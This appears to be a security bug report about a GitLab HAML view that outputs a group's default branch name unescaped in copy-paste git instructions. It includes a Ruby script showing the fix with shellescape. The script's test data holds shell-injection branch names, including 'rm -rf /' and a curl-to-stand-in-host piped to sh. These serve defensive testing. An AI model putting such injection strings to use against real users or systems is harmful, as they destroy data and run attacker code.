Manual repo initialization instructions don't escape special characters and might lead users to copy-paste malicious commands
Summary
Same as #328889 (closed), except for new projects in a group where the default branch name is set to something malicious.
This requires a bit of social engineering and that the victim doesn't pay attention, but it's worth fixing. #328889 (closed) fixed the same issue for merge requests; however, the MR view is in Vue.js and this is a HAML view, so we can't reuse the same fix.
Steps to reproduce
- Create a group
- Set the default branch name to something like `;rm -rf /` in Settings > Repository
- Create a new public project
- Trick someone into initializing it and hope they copy-paste the instructions without paying attention
Example Project
What is the current bug behavior?
Default branch name is output as is.
What is the expected correct behavior?
Default branch name should be escaped.
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com
Possible fixes
We should use `shellescape`, which is a String method in Ruby (provided by the `shellwords` standard library).
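The following is an added example, not code from the GitLab repository, showing why `String#shellescape` fixes the copy-paste problem. The `push_instruction_*` renderers are hypothetical stand-ins for the instruction line the HAML view emits, and the branch names are constructed: the first is the proof of concept from this report, the others add other shell metacharacters. `safe_to_paste?` models what a POSIX shell would receive if the rendered line were pasted and checks that the branch name survives as a single, unchanged argument.

```ruby
require 'shellwords'

# Constructed stand-ins for branch names an attacker could configure as a
# group's default branch (Settings > Repository). The first is the proof of
# concept from the report; the others exercise other shell metacharacters.
MALICIOUS_BRANCHES = [
  ';rm -rf /',
  'main$(touch pwned)',
  "dev' ; curl http://evil.example | sh #"
].freeze

# Hypothetical renderer for the "push an existing folder" instruction with the
# branch name interpolated as is (the current behaviour the report describes).
def push_instruction_unescaped(branch)
  "git push -u origin #{branch}"
end

# Hardened renderer: String#shellescape (stdlib shellwords) backslash-escapes
# every character a Bourne-style shell would interpret, so the pasted branch
# name is one literal word.
def push_instruction_escaped(branch)
  "git push -u origin #{branch.shellescape}"
end

# The argv a POSIX shell would build from the pasted line, or nil when the
# line does not even parse (for example an unbalanced quote).
def pasted_argv(line)
  Shellwords.split(line)
rescue ArgumentError
  nil
end

# The instruction is safe only if the shell sees exactly the five intended
# words and the last one is the branch name unchanged: nothing split off,
# substituted, or left dangling in an open quote.
def safe_to_paste?(line, branch)
  argv = pasted_argv(line)
  !argv.nil? && argv == ['git', 'push', '-u', 'origin', branch]
end

if __FILE__ == $PROGRAM_NAME
  MALICIOUS_BRANCHES.each do |branch|
    unescaped = push_instruction_unescaped(branch)
    escaped   = push_instruction_escaped(branch)
    puts "branch:    #{branch.inspect}"
    puts "unescaped: #{unescaped}  safe=#{safe_to_paste?(unescaped, branch)}"
    puts "escaped:   #{escaped}  safe=#{safe_to_paste?(escaped, branch)}"
  end
end
```

Two caveats for whoever implements the fix: `shellescape` targets Bourne-style shells, so the escaped output still needs the view's normal HTML escaping on top of it, and it does not make the line correct for cmd.exe or PowerShell users, who will see literal backslashes; it only guarantees that pasting into a POSIX shell runs a single `git push`.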